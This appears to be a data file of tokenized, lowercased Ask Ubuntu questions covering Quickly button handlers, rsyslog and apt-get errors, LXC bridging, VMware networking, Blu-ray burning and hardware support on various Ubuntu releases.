489182	button click not recognised in quickly	i am running quickly 12.80.1-0ubuntu2 and for some reason the apps that i generate no longer recognise button clicks . a few weeks ago i created an application using the ubuntu-application template with multiple buttons which referred to the subprocess function . i tried to create an identical application today and it will not work . there is no debug output or anything and the source code is exactly the same . in glade there is a button called button1 and this is my window.py source code # -*- mode : python ; coding : utf-8 ; indent-tabs-mode : nil ; tab-width : 4 -*- # # # begin license # this file is in the public domain # # # end license from locale import gettext as _ from gi.repository import gtk # pylint : disable=e0611 import logging import subprocess logger = logging.getlogger ( 'apppool ' ) from apppool_lib import window from apppool.aboutapppooldialog import aboutapppooldialog from apppool.preferencesapppooldialog import preferencesapppooldialog # see apppool_lib.window.py for more details about how this class works class apppoolwindow ( window ) : __gtype_name__ = `` apppoolwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( apppoolwindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutapppooldialog self.preferencesdialog = preferencesapppooldialog self.button1 = self.builder.get_object ( `` button1 '' ) # code for other initialization actions should be added here . def on_button1_clicked ( self , widget ) : print `` no selected '' subprocess.call ( 'no-tour ' , shell=true ) the `` no selected '' message does n't appear in the terminal either making me think that it is not recognising buttons at all . i am pretty sure this is a bug as i have tried it on multiple computers , created a new project all with the same results . this source code used to work last week but not now so i am pretty sure nothing is wrong with that .
489184	xubuntu imagemagick issues	i 'm running xubuntu 14.04 and every once in a while my screen does n't refresh properly and all i see is a imagemagick window . it has a cartoon image of a wizard wearing a blue robe holding a wand ( see image below ) . when i then move to another work space and back again most of the time my screen is redraw properly again . i 'm not explicitly running imagemagick . i think i might have installed it at some point but i do n't use it . i tried to remove it but it seems to persist . what might be the issue here ? why is the imagemagick window there and how might i start to resolve this issue ?
489186	lxc bridging with two nics	i am setting up a server to host a number of lxc containers , for now just isolating web and db services . the server i am using has two nics and i 'd like to use one for host traffic and one for container traffic ( as both containers have routable ips ) so that i can route the traffic through two different vlans on my switch . before i dive into actually doing all of this i 'm trying to figure out if my way of thinking about how to do this is correct . the way i understand it is i 'd create a bridge device in my hosts interfaces , say br0 , that includes bridge_ports eth1 . as far as i know this bridge should n't require any kind of ip ( but i 'm not really sure ... ) on the containers i would then change the network interfaces to macvlan bridges linked to br0 with static ips . is this even remotely right ? i 've not really worked with container network routing before ... ( also here is a neat illustration of what i think i 'm doing ) + -- -- -- -- -- -- -- -- + | | | managed switch | | | +-+ -- -- -- -- -- + -- -+ | | + -- -- -+ + -- -- -- -+ | | + -- -+ -- -- + + -- + -- -- -+ | | | | | vlan 1 | | vlan 2 | | | | | + -- + -- -- -+ + -- + -- -- -+ | | | eth0 + -- -- -- -- -- -- -+ | eth1 | | | + -- -- -- -- -- -- -- -- -- -+ | | | | + -- -+ -- -- -++ + -- -- -- -- -- -- -- -+ | | | lxc | | | | lxc host + -- -- -- + -- -- -+ web container + -- -+ br0 | | | | | | + -- -- -- -- -- + | + -- -- -- -- -- -- -- -+ | | | | + -- -- -- -- -- -- -- + | | | | | + -- -- -+ db container + -- -- + | | + -- -- -- -- -- -- -- +
489187	is there a specific ubuntu touch rom for xperia ion ?	i just want to know if there is any specific rom online for sony xperia ion . are there installation instruction too ?
489191	dual monitor does not work with intel xeon e3-1200 v2/3rd gen core processor	i have a cirrus7 with an intel i7 processor . according to sudo lspci the graphic unit is a xeon e3-1200 v2/3rd gen core processor . everything used to work fine , but after i upgraded to ubuntu 14.04 the dual monitor mode does not work anymore . when i plug in my projector it flickers ( as if it would be shut of and on ) but i ca n't get it working continuously . the projector it self works with any other machine . so , it ca n't be a hardware problem as far it concerns the projector . unfortunately i do n't have an other device ( monitor or projector ) to test the dual monitor mode with on the cirrus7 . does anybody have an idea what i could do to trace down the problem . which log files could help ? i even tried linux 3.15 but did n't help at all .
489195	package rsyslog is not configured yet	since upgrading to 12.04 from 8.04- > 10.04 i can no longer upgrade or install new packages . i do get a large number of errors , but the first is the resyslog : root @ sub : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 9 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up rsyslog ( 5.8.6-1ubuntu8.6 ) ... dpkg : error processing rsyslog ( -- configure ) : subprocess installed post-installation script returned error exit status 10 dpkg : dependency problems prevent configuration of ubuntu-minimal : ubuntu-minimal depends on rsyslog ; however : package rsyslog is not configured yet . so i try to reinstalling everything : apt-get install -- reinstall dpkg this throws up : processing triggers for man-db ... setting up dpkg ( 1.16.1.2ubuntu7.5 ) ... setting up rsyslog ( 5.8.6-1ubuntu8.6 ) ... dpkg : error processing rsyslog ( -- configure ) : subprocess installed post-installation script returned error exit status 10 no apport report written because maxreports is reached dpkg : dependency problems prevent configuration of ubuntu-minimal : ubuntu-minimal depends on rsyslog ; however : package rsyslog is not configured yet . so i believe if i can fix the rsyslog we 'll be getting somewhere : /
489200	unable to apt-get update /upgrade /installl ubuntu 14.04 -method bzip2 has died unexpectedly	unable to update/upgrade/install ubuntu 14.04 , and it shows the below : get:21 http : //us.archive.ubuntu.com trusty/universe translation-en [ 4,089 kb ] e : method bzip2 has died unexpectedly ! e : sub-process bzip2 received signal 25 . also while upgrading - shows '0 % ' : i was fixing as error ' sts ... 0 % ' while upgrading ubuntu . i tried creating a manual sources.list . i reverted the changes to the file , but the error is still there . below is the result of apt-get update -- print-uris 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/main/source/sources.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_main_source_sources 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/restricted/source/sources.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_restricted_source_sources 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/universe/source/sources.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_universe_source_sources 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/multiverse/source/sources.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_multiverse_source_sources 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/main/binary-amd64/packages.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_main_binary-amd64_packages 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/restricted/binary-amd64/packages.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_restricted_binary-amd64_packages 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/universe/binary-amd64/packages.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_universe_binary-amd64_packages 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/multiverse/binary-amd64/packages.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_multiverse_binary-amd64_packages 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/main/binary-i386/packages.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_main_binary-i386_packages 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/restricted/binary-i386/packages.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_restricted_binary-i386_packages 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/universe/binary-i386/packages.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_universe_binary-i386_packages 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/multiverse/binary-i386/packages.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_multiverse_binary-i386_packages 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/main/i18n/translation-en_us.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_main_i18n_translation-en % 5fus 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/main/i18n/translation-en.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_main_i18n_translation-en 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/multiverse/i18n/translation-en_us.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_multiverse_i18n_translation-en % 5fus 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/multiverse/i18n/translation-en.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_multiverse_i18n_translation-en 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/restricted/i18n/translation-en_us.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_restricted_i18n_translation-en % 5fus 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/restricted/i18n/translation-en.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_restricted_i18n_translation-en 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/universe/i18n/translation-en_us.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_universe_i18n_translation-en % 5fus 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/universe/i18n/translation-en.bz2 ' security.ubuntu.com_ubuntu_dists_trusty-security_universe_i18n_translation-en 0 : 'http : //security.ubuntu.com/ubuntu/dists/trusty-security/inrelease ' security.ubuntu.com_ubuntu_dists_trusty-security_inrelease 0 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/main/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_main_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/restricted/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_restricted_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/universe/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_universe_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/multiverse/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_multiverse_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/main/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_main_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/restricted/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_restricted_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/universe/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_universe_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/multiverse/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_multiverse_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/main/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_main_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/restricted/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_restricted_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/universe/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_universe_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/multiverse/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_multiverse_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/main/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/main/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/multiverse/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_multiverse_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/multiverse/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_multiverse_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/restricted/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_restricted_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/restricted/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_restricted_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/universe/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_universe_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/universe/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty_universe_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty/inrelease ' us.archive.ubuntu.com_ubuntu_dists_trusty_inrelease 0 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/main/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_main_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/restricted/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/universe/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_universe_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/multiverse/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_multiverse_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/main/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_main_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/restricted/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/universe/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_universe_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/multiverse/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_multiverse_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/main/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_main_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/restricted/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/universe/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_universe_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/multiverse/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_multiverse_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/main/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_main_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/main/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_main_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/multiverse/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_multiverse_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/multiverse/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_multiverse_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/restricted/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/restricted/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/universe/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_universe_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/universe/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_universe_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/inrelease ' us.archive.ubuntu.com_ubuntu_dists_trusty-updates_inrelease 0 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/main/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_main_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/restricted/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_restricted_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/universe/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_universe_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/multiverse/source/sources.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_multiverse_source_sources 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/main/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_main_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/restricted/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_restricted_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/universe/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_universe_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/multiverse/binary-amd64/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_multiverse_binary-amd64_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/main/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_main_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/restricted/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_restricted_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/universe/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_universe_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/multiverse/binary-i386/packages.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_multiverse_binary-i386_packages 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/main/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_main_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/main/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_main_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/multiverse/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_multiverse_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/multiverse/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_multiverse_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/restricted/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_restricted_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/restricted/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_restricted_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/universe/i18n/translation-en_us.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_universe_i18n_translation-en % 5fus 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/universe/i18n/translation-en.bz2 ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_universe_i18n_translation-en 0 : 'http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/inrelease ' us.archive.ubuntu.com_ubuntu_dists_trusty-backports_inrelease 0 and below is the output of apt-get update now myprompt : ~ $ sudo apt-get update ign http : //security.ubuntu.com trusty-security inrelease hit http : //security.ubuntu.com trusty-security release.gpg hit http : //security.ubuntu.com trusty-security release hit http : //security.ubuntu.com trusty-security/main sources hit http : //security.ubuntu.com trusty-security/restricted sources hit http : //security.ubuntu.com trusty-security/universe sources hit http : //security.ubuntu.com trusty-security/multiverse sources hit http : //security.ubuntu.com trusty-security/main amd64 packages hit http : //security.ubuntu.com trusty-security/restricted amd64 packages hit http : //security.ubuntu.com trusty-security/universe amd64 packages hit http : //security.ubuntu.com trusty-security/multiverse amd64 packages hit http : //security.ubuntu.com trusty-security/main i386 packages hit http : //security.ubuntu.com trusty-security/restricted i386 packages hit http : //security.ubuntu.com trusty-security/universe i386 packages hit http : //security.ubuntu.com trusty-security/multiverse i386 packages hit http : //security.ubuntu.com trusty-security/main translation-en hit http : //security.ubuntu.com trusty-security/multiverse translation-en hit http : //security.ubuntu.com trusty-security/restricted translation-en hit http : //security.ubuntu.com trusty-security/universe translation-en ign http : //us.archive.ubuntu.com trusty inrelease ign http : //security.ubuntu.com trusty-security/main translation-en_us ign http : //security.ubuntu.com trusty-security/multiverse translation-en_us ign http : //security.ubuntu.com trusty-security/restricted translation-en_us ign http : //security.ubuntu.com trusty-security/universe translation-en_us ign http : //us.archive.ubuntu.com trusty-updates inrelease ign http : //us.archive.ubuntu.com trusty-backports inrelease hit http : //us.archive.ubuntu.com trusty release.gpg hit http : //us.archive.ubuntu.com trusty-updates release.gpg hit http : //us.archive.ubuntu.com trusty-backports release.gpg hit http : //us.archive.ubuntu.com trusty release hit http : //us.archive.ubuntu.com trusty-updates release hit http : //us.archive.ubuntu.com trusty-backports release hit http : //us.archive.ubuntu.com trusty/main sources hit http : //us.archive.ubuntu.com trusty/restricted sources hit http : //us.archive.ubuntu.com trusty/universe sources hit http : //us.archive.ubuntu.com trusty/multiverse sources hit http : //us.archive.ubuntu.com trusty/main amd64 packages hit http : //us.archive.ubuntu.com trusty/restricted amd64 packages hit http : //us.archive.ubuntu.com trusty/universe amd64 packages hit http : //us.archive.ubuntu.com trusty/multiverse amd64 packages hit http : //us.archive.ubuntu.com trusty/main i386 packages hit http : //us.archive.ubuntu.com trusty/restricted i386 packages hit http : //us.archive.ubuntu.com trusty/universe i386 packages hit http : //us.archive.ubuntu.com trusty/multiverse i386 packages hit http : //us.archive.ubuntu.com trusty/main translation-en hit http : //us.archive.ubuntu.com trusty/multiverse translation-en hit http : //us.archive.ubuntu.com trusty/restricted translation-en hit http : //us.archive.ubuntu.com trusty/universe translation-en hit http : //us.archive.ubuntu.com trusty-updates/main sources hit http : //us.archive.ubuntu.com trusty-updates/restricted sources hit http : //us.archive.ubuntu.com trusty-updates/universe sources hit http : //us.archive.ubuntu.com trusty-updates/multiverse sources hit http : //us.archive.ubuntu.com trusty-updates/main amd64 packages hit http : //us.archive.ubuntu.com trusty-updates/restricted amd64 packages hit http : //us.archive.ubuntu.com trusty-updates/universe amd64 packages hit http : //us.archive.ubuntu.com trusty-updates/multiverse amd64 packages hit http : //us.archive.ubuntu.com trusty-updates/main i386 packages hit http : //us.archive.ubuntu.com trusty-updates/restricted i386 packages hit http : //us.archive.ubuntu.com trusty-updates/universe i386 packages hit http : //us.archive.ubuntu.com trusty-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com trusty-updates/main translation-en hit http : //us.archive.ubuntu.com trusty-updates/multiverse translation-en hit http : //us.archive.ubuntu.com trusty-updates/restricted translation-en hit http : //us.archive.ubuntu.com trusty-updates/universe translation-en hit http : //us.archive.ubuntu.com trusty-backports/main sources hit http : //us.archive.ubuntu.com trusty-backports/restricted sources hit http : //us.archive.ubuntu.com trusty-backports/universe sources hit http : //us.archive.ubuntu.com trusty-backports/multiverse sources hit http : //us.archive.ubuntu.com trusty-backports/main amd64 packages hit http : //us.archive.ubuntu.com trusty-backports/restricted amd64 packages hit http : //us.archive.ubuntu.com trusty-backports/universe amd64 packages hit http : //us.archive.ubuntu.com trusty-backports/multiverse amd64 packages hit http : //us.archive.ubuntu.com trusty-backports/main i386 packages hit http : //us.archive.ubuntu.com trusty-backports/restricted i386 packages hit http : //us.archive.ubuntu.com trusty-backports/universe i386 packages hit http : //us.archive.ubuntu.com trusty-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com trusty-backports/main translation-en hit http : //us.archive.ubuntu.com trusty-backports/multiverse translation-en hit http : //us.archive.ubuntu.com trusty-backports/restricted translation-en hit http : //us.archive.ubuntu.com trusty-backports/universe translation-en ign http : //us.archive.ubuntu.com trusty/main translation-en_us ign http : //us.archive.ubuntu.com trusty/multiverse translation-en_us ign http : //us.archive.ubuntu.com trusty/restricted translation-en_us ign http : //us.archive.ubuntu.com trusty/universe translation-en_us ign http : //us.archive.ubuntu.com trusty-updates/main translation-en_us ign http : //us.archive.ubuntu.com trusty-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com trusty-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com trusty-updates/universe translation-en_us ign http : //us.archive.ubuntu.com trusty-backports/main translation-en_us ign http : //us.archive.ubuntu.com trusty-backports/multiverse translation-en_us ign http : //us.archive.ubuntu.com trusty-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com trusty-backports/universe translation-en_us myprompt : ~ $ sts ... 0 %
489201	has anybody installed brother hl-5450dn on ubuntu 14.1 ?	i 'm on my way to a windows-free office environment . i came over a relatively longlasting printer ( 8000 page cartriges ! ) brother hl-5450dn . does anybody use it with ubuntu 14.1 ? ( it should support linux according to the manufacturer . )
489202	frequent short freezes after upgrade to 14.04	a problem emerged when i upgraded kubuntu to 14.04 . in several minutes after booting up , linux starts to freeze shortly ( ~1 second ) and frequently ( every ~5 seconds ) ; not only graphics , but also sound and the general workflow . usually it is starting after i load cpu or network . the same is in mint 17 `` qiana '' ( that is based on the same ubuntu version ) . cpu : amd athlon ii x4 631 motherboard : asrock a55icafe video : amd radeon 6570 ( tried both open source and proprietary drivers ) network : ralink 802.11n wireless
489205	update 12.04 ( precise ) to java 7 ( openjdk )	by default , ubuntu 12.04 comes with openjdk 6 , which is by now quite old and some applications require at least java 7 . how can i update an ubuntu 12.04 installation to java 7 ?
489207	can i get the gnome environment in edubuntu 14.04 ?	i am trying to get a new version of edubuntu . i just want to check whether i can get the gnome environment on edubuntu .
489210	unable to run shell script inside vi/vim	i am trying to run a shell-script say test from vim # ! /bin/sh echo good morning now when i am using : ! % i am getting a pop like shell returned 1 press enter or type command to continue instead of good morning . someone please tell me what am i doing wrong . do i have to change the path , if so how to do it . running it from my home folder
489213	share internet connection from windows 7 to vmware ( ubuntu )	i have a big problem and i can not solve it , so i instaled vmware 9 and inside i have installed ubuntu . my virtual newtork editor : vmnet0 bridged auto-bridging - - - vmnet1 host-only - connected enabled 192.168.46.0 vmnet8 nat nat connected enabled 192.168.144.0 and in ubuntu if i write nano interfaces my configuration is : auto eth0 iface eth0 inet static address 192.168.46.130 gateway 192.168.46.1 netmask 255.255.255.0 network 192.168.46.130 broadcast 192.168.46.255 and if i write in ubuntu ping google.com ( host unreachable ) ... maybe the problem is in configuration of ubuntu but i do n't understand where is.help me please guys.exist a solution ?
489214	ubuntu-touch for dual core phone	is it possible to install ubuntu-touch in any android phone having dual core or quad core with 1 gb of ram . the ubuntu-touch is still in beta version or rc thank you
489216	xampp ( lampp ) on ubuntu touch	can i install and run xampp ( lampp ) on ubuntu touch on a nexus 10 in order to host a local website ( that needs php and mysql ) ?
489217	using `growisofs` to burn a blu-ray from an .iso	in using growisofs to burn a blank blu-ray disk from an .iso file i encounter the following error . /dev/dvdrw : media is not recognized as recordable dvd how do i resolve this problem ? the command i used was : growisofs -speed=2 -dvd-compat -z /dev/dvdrw=/home/user/image.iso this command was taken from this page , in the blu-ray part of the documentation : ubunutu help page note that nautilus shows the blank blu-ray just before i issue the growisofs command so i think i can assume ubuntu is recognizing the device and disk medium . the screenshot shows the blank blu-ray in the upper left near the word `` device '' . the machine is the samsung rf711 .
489220	what ubuntu version should i install to old netbook	i´ve here a few years old netbook acer aspire one , 1gb ram , 16gb hdd , intel atom 1,6ghz . original os was windows xp , but with xps the system is so slowly . now , before i trash that , i´d like to try it with ubuntu . but what ubuntu i should try into ? when i compare older ubuntu with the newer ones ( or the newest one ) , how with performance ? should i try to install there any older ? let´s say ubuntu 8 or 10 ? i´ve found a few benchmarks comparing winxp and ubuntu 8.04 , but it was test with unstandard operations and ubuntu was there faster . but how with normal using for non-it , not for me ? just conect to internet , read & write mails and work with ms word ( or writer in libreoffice ) ? thanks for advices . ps . i´m using ubuntu 12.04 for last two years , so i have no option how to compare previous versions with older ones . but i suppose in currect ( or newer ) version whould be effects which could be too much for that old netbook .
